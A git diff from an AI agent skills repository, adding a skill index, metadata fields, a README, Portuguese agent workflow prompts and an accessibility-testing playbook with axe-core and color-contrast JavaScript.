+ "path": "skills/whatsapp-automation",
+ "category": "uncategorized",
+ "name": "whatsapp-automation",
+ "description": "Automate WhatsApp Business tasks via Rube MCP (Composio): send messages, manage templates, upload media, and handle contacts. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wiki-architect",
+ "path": "skills/wiki-architect",
+ "category": "uncategorized",
+ "name": "wiki-architect",
+ "description": "Analyzes code repositories and generates hierarchical documentation structures with onboarding guides. Use when the user wants to create a wiki, generate documentation, map a codebase structure, or...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wiki-changelog",
+ "path": "skills/wiki-changelog",
+ "category": "uncategorized",
+ "name": "wiki-changelog",
+ "description": "Analyzes git commit history and generates structured changelogs categorized by change type. Use when the user asks about recent changes, wants a changelog, or needs to understand what changed in th...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wiki-onboarding",
+ "path": "skills/wiki-onboarding",
+ "category": "uncategorized",
+ "name": "wiki-onboarding",
+ "description": "Generates two complementary onboarding guides \u2014 a Principal-Level architectural deep-dive and a Zero-to-Hero contributor walkthrough. Use when the user wants onboarding documentation fo...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wiki-page-writer",
+ "path": "skills/wiki-page-writer",
+ "category": "uncategorized",
+ "name": "wiki-page-writer",
+ "description": "Generates rich technical documentation pages with dark-mode Mermaid diagrams, source code citations, and first-principles depth. Use when writing documentation, generating wiki pages, creating tech...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wiki-qa",
+ "path": "skills/wiki-qa",
+ "category": "uncategorized",
+ "name": "wiki-qa",
+ "description": "Answers questions about a code repository using source file analysis. Use when the user asks a question about how something works, wants to understand a component, or needs help navigating the code...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wiki-researcher",
+ "path": "skills/wiki-researcher",
+ "category": "uncategorized",
+ "name": "wiki-researcher",
+ "description": "Conducts multi-turn iterative deep research on specific topics within a codebase with zero tolerance for shallow analysis. Use when the user wants an in-depth investigation, needs to understand how...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wiki-vitepress",
+ "path": "skills/wiki-vitepress",
+ "category": "uncategorized",
+ "name": "wiki-vitepress",
+ "description": "Packages generated wiki Markdown into a VitePress static site with dark theme, dark-mode Mermaid diagrams with click-to-zoom, and production build output. Use when the user wants to create a browsa...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "windows-privilege-escalation",
+ "path": "skills/windows-privilege-escalation",
+ "category": "uncategorized",
+ "name": "windows-privilege-escalation",
+ "description": "This skill should be used when the user asks to \"escalate privileges on Windows,\" \"find Windows privesc vectors,\" \"enumerate Windows for privilege escalation,\" \"exploit Windows miscon...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wireshark-analysis",
+ "path": "skills/wireshark-analysis",
+ "category": "uncategorized",
+ "name": "wireshark-analysis",
+ "description": "This skill should be used when the user asks to \"analyze network traffic with Wireshark\", \"capture packets for troubleshooting\", \"filter PCAP files\", \"follow TCP/UDP streams\", \"dete...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wordpress",
+ "path": "skills/wordpress",
+ "category": "workflow-bundle",
+ "name": "wordpress",
+ "description": "Complete WordPress development workflow covering theme development, plugin creation, WooCommerce integration, performance optimization, and security hardening.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wordpress-penetration-testing",
+ "path": "skills/wordpress-penetration-testing",
+ "category": "uncategorized",
+ "name": "wordpress-penetration-testing",
+ "description": "This skill should be used when the user asks to \"pentest WordPress sites\", \"scan WordPress for vulnerabilities\", \"enumerate WordPress users, themes, or plugins\", \"exploit WordPress vu...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wordpress-plugin-development",
+ "path": "skills/wordpress-plugin-development",
+ "category": "granular-workflow-bundle",
+ "name": "wordpress-plugin-development",
+ "description": "WordPress plugin development workflow covering plugin architecture, hooks, admin interfaces, REST API, and security best practices.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wordpress-theme-development",
+ "path": "skills/wordpress-theme-development",
+ "category": "granular-workflow-bundle",
+ "name": "wordpress-theme-development",
+ "description": "WordPress theme development workflow covering theme architecture, template hierarchy, custom post types, block editor support, and responsive design.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wordpress-woocommerce-development",
+ "path": "skills/wordpress-woocommerce-development",
+ "category": "granular-workflow-bundle",
+ "name": "wordpress-woocommerce-development",
+ "description": "WooCommerce store development workflow covering store setup, payment integration, shipping configuration, and customization.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "workflow-automation",
+ "path": "skills/workflow-automation",
+ "category": "uncategorized",
+ "name": "workflow-automation",
+ "description": "Workflow automation is the infrastructure that makes AI agents reliable. Without durable execution, a network hiccup during a 10-step payment flow means lost money and angry customers. With it, wor...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "workflow-orchestration-patterns",
+ "path": "skills/workflow-orchestration-patterns",
+ "category": "uncategorized",
+ "name": "workflow-orchestration-patterns",
+ "description": "Design durable workflows with Temporal for distributed systems. Covers workflow vs activity separation, saga patterns, state management, and determinism constraints. Use when building long-running ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "workflow-patterns",
+ "path": "skills/workflow-patterns",
+ "category": "uncategorized",
+ "name": "workflow-patterns",
+ "description": "Use this skill when implementing tasks according to Conductor's TDD workflow, handling phase checkpoints, managing git commits for tasks, or understanding the verification protocol.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wrike-automation",
+ "path": "skills/wrike-automation",
+ "category": "uncategorized",
+ "name": "wrike-automation",
+ "description": "Automate Wrike project management via Rube MCP (Composio): create tasks/folders, manage projects, assign work, and track progress. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "writer",
+ "path": "skills/libreoffice/writer",
+ "category": "document-processing",
+ "name": "writer",
+ "description": "Document creation, format conversion (ODT/DOCX/PDF), mail merge, and automation with LibreOffice Writer.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "writing-plans",
+ "path": "skills/writing-plans",
+ "category": "uncategorized",
+ "name": "writing-plans",
+ "description": "Use when you have a spec or requirements for a multi-step task, before touching code",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "writing-skills",
+ "path": "skills/writing-skills",
+ "category": "meta",
+ "name": "writing-skills",
+ "description": "Use when creating, updating, or improving agent skills.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "x-article-publisher-skill",
+ "path": "skills/x-article-publisher-skill",
+ "category": "uncategorized",
+ "name": "x-article-publisher-skill",
+ "description": "Publish articles to X/Twitter",
+ "risk": "safe",
+ "source": "https://github.com/wshuyi/x-article-publisher-skill",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "x-twitter-scraper",
+ "path": "skills/x-twitter-scraper",
+ "category": "data",
+ "name": "x-twitter-scraper",
+ "description": "X (Twitter) data platform skill \u2014 tweet search, user lookup, follower extraction, engagement metrics, giveaway draws, monitoring, webhooks, 19 extraction tools, MCP server.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-28"
+ },
+ {
+ "id": "xlsx-official",
+ "path": "skills/xlsx-official",
+ "category": "uncategorized",
+ "name": "xlsx-official",
+ "description": "Comprehensive spreadsheet creation, editing, and analysis with support for formulas, formatting, data analysis, and visualization. When Claude needs to work with spreadsheets (.xlsx, .xlsm, .csv, ....",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "xss-html-injection",
+ "path": "skills/xss-html-injection",
+ "category": "uncategorized",
+ "name": "xss-html-injection",
+ "description": "This skill should be used when the user asks to \"test for XSS vulnerabilities\", \"perform cross-site scripting attacks\", \"identify HTML injection flaws\", \"exploit client-side injection...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "youtube-automation",
+ "path": "skills/youtube-automation",
+ "category": "uncategorized",
+ "name": "youtube-automation",
+ "description": "Automate YouTube tasks via Rube MCP (Composio): upload videos, manage playlists, search content, get analytics, and handle comments. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "youtube-summarizer",
+ "path": "skills/youtube-summarizer",
+ "category": "content",
+ "name": "youtube-summarizer",
+ "description": "Extract transcripts from YouTube videos and generate comprehensive, detailed summaries using intelligent analysis frameworks",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "zapier-make-patterns",
+ "path": "skills/zapier-make-patterns",
+ "category": "uncategorized",
+ "name": "zapier-make-patterns",
+ "description": "No-code automation democratizes workflow building. Zapier and Make (formerly Integromat) let non-developers automate business processes without writing code. But no-code doesn't mean no-complexity ...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "zendesk-automation",
+ "path": "skills/zendesk-automation",
+ "category": "uncategorized",
+ "name": "zendesk-automation",
+ "description": "Automate Zendesk tasks via Rube MCP (Composio): tickets, users, organizations, replies. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "zoho-crm-automation",
+ "path": "skills/zoho-crm-automation",
+ "category": "uncategorized",
+ "name": "zoho-crm-automation",
+ "description": "Automate Zoho CRM tasks via Rube MCP (Composio): create/update records, search contacts, manage leads, and convert leads. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "zoom-automation",
+ "path": "skills/zoom-automation",
+ "category": "uncategorized",
+ "name": "zoom-automation",
+ "description": "Automate Zoom meeting creation, management, recordings, webinars, and participant tracking via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "zustand-store-ts",
+ "path": "skills/zustand-store-ts",
+ "category": "uncategorized",
+ "name": "zustand-store-ts",
+ "description": "Create Zustand stores with TypeScript, subscribeWithSelector middleware, and proper state/action separation. Use when building React state management, creating global stores, or implementing reacti...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ }
+]
\ No newline at end of file
diff --git a/web-app/public/skills/.gitignore b/web-app/public/skills/.gitignore
new file mode 100644
index 00000000..df32d5f1
--- /dev/null
+++ b/web-app/public/skills/.gitignore
@@ -0,0 +1,3 @@
+# Local-only: disabled skills for lean configuration
+# These skills are kept in the repository but disabled locally
+.disabled/
diff --git a/web-app/public/skills/00-andruia-consultant/SKILL.md b/web-app/public/skills/00-andruia-consultant/SKILL.md
index c02b25e4..e1733576 100644
--- a/web-app/public/skills/00-andruia-consultant/SKILL.md
+++ b/web-app/public/skills/00-andruia-consultant/SKILL.md
@@ -5,6 +5,7 @@ description: "Arquitecto de Soluciones Principal y Consultor Tecnológico de And
category: andruia
risk: safe
source: personal
+date_added: "2026-02-27"
---
## When to Use
diff --git a/web-app/public/skills/10-andruia-skill-smith/SKILL.MD b/web-app/public/skills/10-andruia-skill-smith/SKILL.MD
index 9f4325d4..572c327e 100644
--- a/web-app/public/skills/10-andruia-skill-smith/SKILL.MD
+++ b/web-app/public/skills/10-andruia-skill-smith/SKILL.MD
@@ -3,12 +3,16 @@ id: 10-andruia-skill-smith
name: 10-andruia-skill-smith
description: "Ingeniero de Sistemas de Andru.ia. Diseña, redacta y despliega nuevas habilidades (skills) dentro del repositorio siguiendo el Estándar de Diamante."
category: andruia
-risk: official
+risk: safe
source: personal
+date_added: "2026-02-25"
---
# 🔨 Andru.ia Skill-Smith (The Forge)
+## When to Use
+Esta habilidad es aplicable para ejecutar el flujo de trabajo o las acciones descritas en la descripción general.
+
## 📝 Descripción
Soy el Ingeniero de Sistemas de Andru.ia. Mi propósito es diseñar, redactar y desplegar nuevas habilidades (skills) dentro del repositorio, asegurando que cumplan con la estructura oficial de Antigravity y el Estándar de Diamante.
@@ -38,4 +42,4 @@ Generar el código para los siguientes archivos:
## ⚠️ Reglas de Oro
- **Prefijos Numéricos:** Asignar un número correlativo a la carpeta (ej. 11, 12, 13) para mantener el orden.
-- **Prompt Engineering:** Las instrucciones deben incluir técnicas de "Few-shot" o "Chain of Thought" para máxima precisión.
\ No newline at end of file
+- **Prompt Engineering:** Las instrucciones deben incluir técnicas de "Few-shot" o "Chain of Thought" para máxima precisión.
diff --git a/web-app/public/skills/20-andruia-niche-intelligence/SKILL.md b/web-app/public/skills/20-andruia-niche-intelligence/SKILL.md
index 9791b628..637d909c 100644
--- a/web-app/public/skills/20-andruia-niche-intelligence/SKILL.md
+++ b/web-app/public/skills/20-andruia-niche-intelligence/SKILL.md
@@ -5,6 +5,7 @@ description: "Estratega de Inteligencia de Dominio de Andru.ia. Analiza el nicho
category: andruia
risk: safe
source: personal
+date_added: "2026-02-27"
---
## When to Use
diff --git a/web-app/public/skills/3d-web-experience/SKILL.md b/web-app/public/skills/3d-web-experience/SKILL.md
index 5a2692d4..f1ca0758 100644
--- a/web-app/public/skills/3d-web-experience/SKILL.md
+++ b/web-app/public/skills/3d-web-experience/SKILL.md
@@ -1,8 +1,9 @@
---
name: 3d-web-experience
description: "Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL, and interactive 3D scenes. Covers product configurators, 3D portfolios, immersive websites, and bringing ..."
-source: vibeship-spawner-skills (Apache 2.0)
risk: unknown
+source: "vibeship-spawner-skills (Apache 2.0)"
+date_added: "2026-02-27"
---
# 3D Web Experience
diff --git a/web-app/public/skills/README.md b/web-app/public/skills/README.md
new file mode 100644
index 00000000..e536163f
--- /dev/null
+++ b/web-app/public/skills/README.md
@@ -0,0 +1,201 @@
+# Skills Directory
+
+**Welcome to the skills folder!** This is where all 179+ specialized AI skills live.
+
+## 🤔 What Are Skills?
+
+Skills are specialized instruction sets that teach AI assistants how to handle specific tasks. Think of them as expert knowledge modules that your AI can load on-demand.
+
+**Simple analogy:** Just like you might consult different experts (a designer, a security expert, a marketer), skills let your AI become an expert in different areas when you need them.
+
+---
+
+## 📂 Folder Structure
+
+Each skill lives in its own folder with this structure:
+
+```
+skills/
+├── skill-name/ # Individual skill folder
+│ ├── SKILL.md # Main skill definition (required)
+│ ├── scripts/ # Helper scripts (optional)
+│ ├── examples/ # Usage examples (optional)
+│ └── resources/ # Templates & resources (optional)
+```
+
+**Key point:** Only `SKILL.md` is required. Everything else is optional!
+
+---
+
+## How to Use Skills
+
+### Step 1: Make sure skills are installed
+Skills should be in your `.agent/skills/` directory (or `.claude/skills/`, `.gemini/skills/`, etc.)
+
+### Step 2: Invoke a skill in your AI chat
+Use the `@` symbol followed by the skill name:
+
+```
+@brainstorming help me design a todo app
+```
+
+or
+
+```
+@stripe-integration add payment processing to my app
+```
+
+### Step 3: The AI becomes an expert
+The AI loads that skill's knowledge and helps you with specialized expertise!
+
+---
+
+## Skill Categories
+
+### Creative & Design
+Skills for visual design, UI/UX, and artistic creation:
+- `@algorithmic-art` - Create algorithmic art with p5.js
+- `@canvas-design` - Design posters and artwork (PNG/PDF output)
+- `@frontend-design` - Build production-grade frontend interfaces
+- `@ui-ux-pro-max` - Professional UI/UX design with color, fonts, layouts
+- `@web-artifacts-builder` - Build modern web apps (React, Tailwind, Shadcn/ui)
+- `@theme-factory` - Generate themes for documents and presentations
+- `@brand-guidelines` - Apply Anthropic brand design standards
+- `@slack-gif-creator` - Create high-quality GIFs for Slack
+
+### Development & Engineering
+Skills for coding, testing, debugging, and code review:
+- `@test-driven-development` - Write tests before implementation (TDD)
+- `@systematic-debugging` - Debug systematically, not randomly
+- `@webapp-testing` - Test web apps with Playwright
+- `@receiving-code-review` - Handle code review feedback properly
+- `@requesting-code-review` - Request code reviews before merging
+- `@finishing-a-development-branch` - Complete dev branches (merge, PR, cleanup)
+- `@subagent-driven-development` - Coordinate multiple AI agents for parallel tasks
+
+### Documentation & Office
+Skills for working with documents and office files:
+- `@doc-coauthoring` - Collaborate on structured documents
+- `@docx` - Create, edit, and analyze Word documents
+- `@xlsx` - Work with Excel spreadsheets (formulas, charts)
+- `@pptx` - Create and modify PowerPoint presentations
+- `@pdf` - Handle PDFs (extract text, merge, split, fill forms)
+- `@internal-comms` - Draft internal communications (reports, announcements)
+- `@notebooklm` - Query Google NotebookLM notebooks
+
+### Planning & Workflow
+Skills for task planning and workflow optimization:
+- `@brainstorming` - Brainstorm and design before coding
+- `@writing-plans` - Write detailed implementation plans
+- `@planning-with-files` - File-based planning system (Manus-style)
+- `@executing-plans` - Execute plans with checkpoints and reviews
+- `@using-git-worktrees` - Create isolated Git worktrees for parallel work
+- `@verification-before-completion` - Verify work before claiming completion
+- `@using-superpowers` - Discover and use advanced skills
+
+### System Extension
+Skills for extending AI capabilities:
+- `@mcp-builder` - Build MCP (Model Context Protocol) servers
+- `@skill-creator` - Create new skills or update existing ones
+- `@writing-skills` - Tools for writing and validating skill files
+- `@dispatching-parallel-agents` - Distribute tasks to multiple agents
+
+---
+
+## Finding Skills
+
+### Method 1: Browse this folder
+```bash
+ls skills/
+```
+
+### Method 2: Search by keyword
+```bash
+ls skills/ | grep "keyword"
+```
+
+### Method 3: Check the main README
+See the [main README](../README.md) for the complete list of all 179+ skills organized by category.
+
+---
+
+## 💡 Popular Skills to Try
+
+**For beginners:**
+- `@brainstorming` - Design before coding
+- `@systematic-debugging` - Fix bugs methodically
+- `@git-pushing` - Commit with good messages
+
+**For developers:**
+- `@test-driven-development` - Write tests first
+- `@react-best-practices` - Modern React patterns
+- `@senior-fullstack` - Full-stack development
+
+**For security:**
+- `@ethical-hacking-methodology` - Security basics
+- `@burp-suite-testing` - Web app security testing
+
+---
+
+## Creating Your Own Skill
+
+Want to create a new skill? Check out:
+1. [CONTRIBUTING.md](../CONTRIBUTING.md) - How to contribute
+2. [docs/SKILL_ANATOMY.md](../docs/SKILL_ANATOMY.md) - Skill structure guide
+3. `@skill-creator` - Use this skill to create new skills!
+
+**Basic structure:**
+```markdown
+---
+name: my-skill-name
+description: "What this skill does"
+---
+
+# Skill Title
+
+## Overview
+[What this skill does]
+
+## When to Use
+- Use when [scenario]
+
+## Instructions
+[Step-by-step guide]
+
+## Examples
+[Code examples]
+```
+
+---
+
+## Documentation
+
+- **[Getting Started](../docs/GETTING_STARTED.md)** - Quick start guide
+- **[Examples](../docs/EXAMPLES.md)** - Real-world usage examples
+- **[FAQ](../docs/FAQ.md)** - Common questions
+- **[Visual Guide](../docs/VISUAL_GUIDE.md)** - Diagrams and flowcharts
+
+---
+
+## 🌟 Contributing
+
+Found a skill that needs improvement? Want to add a new skill?
+
+1. Read [CONTRIBUTING.md](../CONTRIBUTING.md)
+2. Study existing skills in this folder
+3. Create your skill following the structure
+4. Submit a Pull Request
+
+---
+
+## References
+
+- [Anthropic Skills](https://github.com/anthropic/skills) - Official Anthropic skills
+- [UI/UX Pro Max Skills](https://github.com/nextlevelbuilder/ui-ux-pro-max-skill) - Design skills
+- [Superpowers](https://github.com/obra/superpowers) - Original superpowers collection
+- [Planning with Files](https://github.com/OthmanAdi/planning-with-files) - Planning patterns
+- [NotebookLM](https://github.com/PleasePrompto/notebooklm-skill) - NotebookLM integration
+
+---
+
+**Need help?** Check the [FAQ](../docs/FAQ.md) or open an issue on GitHub!
diff --git a/web-app/public/skills/SPDD/1-research.md b/web-app/public/skills/SPDD/1-research.md
new file mode 100644
index 00000000..91192c00
--- /dev/null
+++ b/web-app/public/skills/SPDD/1-research.md
@@ -0,0 +1,22 @@
+# ROLE: Codebase Research Agent
+Sua única missão é documentar e explicar a base de código como ela existe hoje.
+
+## CRITICAL RULES:
+- NÃO sugira melhorias, refatorações ou mudanças arquiteturais.
+- NÃO realize análise de causa raiz ou proponha melhorias futuras.
+- APENAS descreva o que existe, onde existe e como os componentes interagem.
+- Você é um cartógrafo técnico criando um mapa do sistema atual.
+
+## STEPS TO FOLLOW:
+1. **Initial Analysis:** Leia os arquivos mencionados pelo usuário integralmente (SEM limit/offset).
+2. **Decomposition:** Decompunha a dúvida do usuário em áreas de pesquisa (ex: Rotas, Banco, UI).
+3. **Execution:** - Localize onde os arquivos e componentes vivem.
+ - Analise COMO o código atual funciona (sem criticar).
+ - Encontre exemplos de padrões existentes para referência.
+4. **Project State:**
+ - Se projeto NOVO: Pesquise e liste a melhor estrutura de pastas e bibliotecas padrão de mercado para a stack.
+ - Se projeto EXISTENTE: Identifique dívidas técnicas ou padrões que devem ser respeitados.
+
+## OUTPUT:
+- Gere o arquivo `docs/prds/prd_current_task.md` com YAML frontmatter (date, topic, tags, status).
+- **Ação Obrigatória:** Termine com: "Pesquisa concluída. Por favor, dê um `/clear` e carregue `.agente/2-spec.md` para o planejamento."
\ No newline at end of file
diff --git a/web-app/public/skills/SPDD/2-spec.md b/web-app/public/skills/SPDD/2-spec.md
new file mode 100644
index 00000000..b60c3724
--- /dev/null
+++ b/web-app/public/skills/SPDD/2-spec.md
@@ -0,0 +1,20 @@
+# ROLE: Implementation Planning Agent
+Você deve criar planos de implementação detalhados e ser cético quanto a requisitos vagos.
+
+## CRITICAL RULES:
+- Não escreva o plano de uma vez; valide a estrutura das fases com o usuário.
+- Cada decisão técnica deve ser tomada antes de finalizar o plano.
+- O plano deve ser acionável e completo, sem "perguntas abertas".
+
+## STEPS TO FOLLOW:
+1. **Context Check:** Leia o `docs/prds/prd_current_task.md` gerado anteriormente.
+2. **Phasing:** Divida o trabalho em fases incrementais e testáveis.
+3. **Detailing:** Para cada arquivo afetado, defina:
+ - **Path exato.**
+ - **Ação:** (CRIAR | MODIFICAR | DELETAR).
+ - **Lógica:** Snippets de pseudocódigo ou referências de implementação.
+4. **Success Criteria:** Defina "Automated Verification" (scripts/testes) e "Manual Verification" (UI/UX).
+
+## OUTPUT:
+- Gere o arquivo `docs/specs/spec_current_task.md` seguindo o template de fases.
+- **Ação Obrigatória:** Termine com: "Spec finalizada. Por favor, dê um `/clear` e carregue `.agente/3-implementation.md` para execução."
\ No newline at end of file
diff --git a/web-app/public/skills/SPDD/3-implementation.md b/web-app/public/skills/SPDD/3-implementation.md
new file mode 100644
index 00000000..a2e2a7cf
--- /dev/null
+++ b/web-app/public/skills/SPDD/3-implementation.md
@@ -0,0 +1,20 @@
+# ROLE: Implementation Execution Agent
+Você deve implementar um plano técnico aprovado com precisão cirúrgica.
+
+## CRITICAL RULES:
+- Siga a intenção do plano enquanto se adapta à realidade encontrada.
+- Implemente uma fase COMPLETAMENTE antes de passar para a próxima.
+- **STOP & THINK:** Se encontrar um erro na Spec ou um mismatch no código, PARE e reporte. Não tente adivinhar.
+
+## STEPS TO FOLLOW:
+1. **Sanity Check:** Leia a Spec e o Ticket original. Verifique se o ambiente está limpo.
+2. **Execution:** Codifique seguindo os padrões de Clean Code e os snippets da Spec.
+3. **Verification:**
+ - Após cada fase, execute os comandos de "Automated Verification" descritos na Spec.
+ - PAUSE para confirmação manual do usuário após cada fase concluída.
+4. **Progress:** Atualize os checkboxes (- [x]) no arquivo de Spec conforme avança.
+
+## OUTPUT:
+- Código fonte implementado.
+- Relatório de conclusão de fase com resultados de testes.
+- **Ação Final:** Pergunte se o usuário deseja realizar testes de regressão ou seguir para a próxima task.
\ No newline at end of file
diff --git a/web-app/public/skills/ab-test-setup/SKILL.md b/web-app/public/skills/ab-test-setup/SKILL.md
index 12ead27c..e72382ee 100644
--- a/web-app/public/skills/ab-test-setup/SKILL.md
+++ b/web-app/public/skills/ab-test-setup/SKILL.md
@@ -3,6 +3,7 @@ name: ab-test-setup
description: "Structured guide for setting up A/B tests with mandatory gates for hypothesis, metrics, and execution readiness."
risk: unknown
source: community
+date_added: "2026-02-27"
---
# A/B Test Setup
diff --git a/web-app/public/skills/accessibility-compliance-accessibility-audit/SKILL.md b/web-app/public/skills/accessibility-compliance-accessibility-audit/SKILL.md
index 172a8f37..32e0d706 100644
--- a/web-app/public/skills/accessibility-compliance-accessibility-audit/SKILL.md
+++ b/web-app/public/skills/accessibility-compliance-accessibility-audit/SKILL.md
@@ -3,6 +3,7 @@ name: accessibility-compliance-accessibility-audit
description: "You are an accessibility expert specializing in WCAG compliance, inclusive design, and assistive technology compatibility. Conduct audits, identify barriers, and provide remediation guidance."
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Accessibility Audit and Testing
diff --git a/web-app/public/skills/accessibility-compliance-accessibility-audit/resources/implementation-playbook.md b/web-app/public/skills/accessibility-compliance-accessibility-audit/resources/implementation-playbook.md
new file mode 100644
index 00000000..472aa5dc
--- /dev/null
+++ b/web-app/public/skills/accessibility-compliance-accessibility-audit/resources/implementation-playbook.md
@@ -0,0 +1,502 @@
+# Accessibility Audit and Testing Implementation Playbook
+
+This file contains detailed patterns, checklists, and code samples referenced by the skill.
+
+## Instructions
+
+### 1. Automated Testing with axe-core
+
+```javascript
+// accessibility-test.js
+const { AxePuppeteer } = require("@axe-core/puppeteer");
+const puppeteer = require("puppeteer");
+
+class AccessibilityAuditor {
+ constructor(options = {}) {
+ this.wcagLevel = options.wcagLevel || "AA";
+ this.viewport = options.viewport || { width: 1920, height: 1080 };
+ }
+
+ async runFullAudit(url) {
+ const browser = await puppeteer.launch();
+ const page = await browser.newPage();
+ await page.setViewport(this.viewport);
+ await page.goto(url, { waitUntil: "networkidle2" });
+
+ const results = await new AxePuppeteer(page)
+ .withTags(["wcag2a", "wcag2aa", "wcag21a", "wcag21aa"])
+ .exclude(".no-a11y-check")
+ .analyze();
+
+ await browser.close();
+
+ return {
+ url,
+ timestamp: new Date().toISOString(),
+ violations: results.violations.map((v) => ({
+ id: v.id,
+ impact: v.impact,
+ description: v.description,
+ help: v.help,
+ helpUrl: v.helpUrl,
+ nodes: v.nodes.map((n) => ({
+ html: n.html,
+ target: n.target,
+ failureSummary: n.failureSummary,
+ })),
+ })),
+ score: this.calculateScore(results),
+ };
+ }
+
+ calculateScore(results) {
+ const weights = { critical: 10, serious: 5, moderate: 2, minor: 1 };
+ let totalWeight = 0;
+ results.violations.forEach((v) => {
+ totalWeight += weights[v.impact] || 0;
+ });
+ return Math.max(0, 100 - totalWeight);
+ }
+}
+
+// Component testing with jest-axe
+import { render } from "@testing-library/react";
+import { axe, toHaveNoViolations } from "jest-axe";
+
+expect.extend(toHaveNoViolations);
+
+describe("Accessibility Tests", () => {
+ it("should have no violations", async () => {
+ const { container } = render( );
+ const results = await axe(container);
+ expect(results).toHaveNoViolations();
+ });
+});
+```
+
+### 2. Color Contrast Validation
+
+```javascript
+// color-contrast.js
+class ColorContrastAnalyzer {
+ constructor() {
+ this.wcagLevels = {
+ 'AA': { normal: 4.5, large: 3 },
+ 'AAA': { normal: 7, large: 4.5 }
+ };
+ }
+
+ async analyzePageContrast(page) {
+ const elements = await page.evaluate(() => {
+ return Array.from(document.querySelectorAll('*'))
+ .filter(el => el.innerText && el.innerText.trim())
+ .map(el => {
+ const styles = window.getComputedStyle(el);
+ return {
+ text: el.innerText.trim().substring(0, 50),
+ color: styles.color,
+ backgroundColor: styles.backgroundColor,
+ fontSize: parseFloat(styles.fontSize),
+ fontWeight: styles.fontWeight
+ };
+ });
+ });
+
+ return elements
+ .map(el => {
+ const contrast = this.calculateContrast(el.color, el.backgroundColor);
+ const isLarge = this.isLargeText(el.fontSize, el.fontWeight);
+ const required = isLarge ? this.wcagLevels.AA.large : this.wcagLevels.AA.normal;
+
+ if (contrast < required) {
+ return {
+ text: el.text,
+ currentContrast: contrast.toFixed(2),
+ requiredContrast: required,
+ foreground: el.color,
+ background: el.backgroundColor
+ };
+ }
+ return null;
+ })
+ .filter(Boolean);
+ }
+
+ calculateContrast(fg, bg) {
+ const l1 = this.relativeLuminance(this.parseColor(fg));
+ const l2 = this.relativeLuminance(this.parseColor(bg));
+ const lighter = Math.max(l1, l2);
+ const darker = Math.min(l1, l2);
+ return (lighter + 0.05) / (darker + 0.05);
+ }
+
+ relativeLuminance(rgb) {
+ const [r, g, b] = rgb.map(val => {
+ val = val / 255;
+ return val <= 0.03928 ? val / 12.92 : Math.pow((val + 0.055) / 1.055, 2.4);
+ });
+ return 0.2126 * r + 0.7152 * g + 0.0722 * b;
+ }
+}
+
+// High contrast CSS
+@media (prefers-contrast: high) {
+ :root {
+ --text-primary: #000;
+ --bg-primary: #fff;
+ --border-color: #000;
+ }
+ a { text-decoration: underline !important; }
+ button, input { border: 2px solid var(--border-color) !important; }
+}
+```
+
+### 3. Keyboard Navigation Testing
+
+```javascript
+// keyboard-navigation.js
+class KeyboardNavigationTester {
+ async testKeyboardNavigation(page) {
+ const results = {
+ focusableElements: [],
+ missingFocusIndicators: [],
+ keyboardTraps: [],
+ };
+
+ // Get all focusable elements
+ const focusable = await page.evaluate(() => {
+ const selector =
